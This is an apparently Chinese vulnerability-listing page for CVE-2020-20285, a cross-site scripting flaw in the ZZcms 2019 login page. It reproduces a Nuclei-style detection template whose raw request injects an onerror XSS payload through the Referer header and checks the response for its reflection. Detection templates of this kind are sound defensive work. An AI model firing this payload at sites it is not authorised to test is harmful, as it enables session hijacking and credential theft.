CVE-2020-20285: ZZcms - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: ZZcms | POC: 已公开

漏洞描述

ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.

PoC代码[已公开]

id: CVE-2020-20285

info:
  name: ZZcms - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-20285
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-20285
    cwe-id: CWE-79
    epss-score: 0.06066
    epss-percentile: 0.90395
    cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zzcms
    product: zzcms
    fofa-query: zzcms
  tags: cve2020,cve,zzcms,xss

http:
  - raw:
      - |
        GET /user/login.php HTTP/1.1
        Host: {{Hostname}}
        Referer: xss"/><img src="#" onerror="alert(document.domain)"/>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'fromurl" type="hidden" value="xss"/><img src="#" onerror="alert(document.domain)"/>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402200d8631c780c7fd7b1c3c9251e160c3c0e22f68382a79f53f8ca6fb193c2540f502203c57adca785f372dfec291e3382242ca8067a12acaee75b83c366b9463a3cc4a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐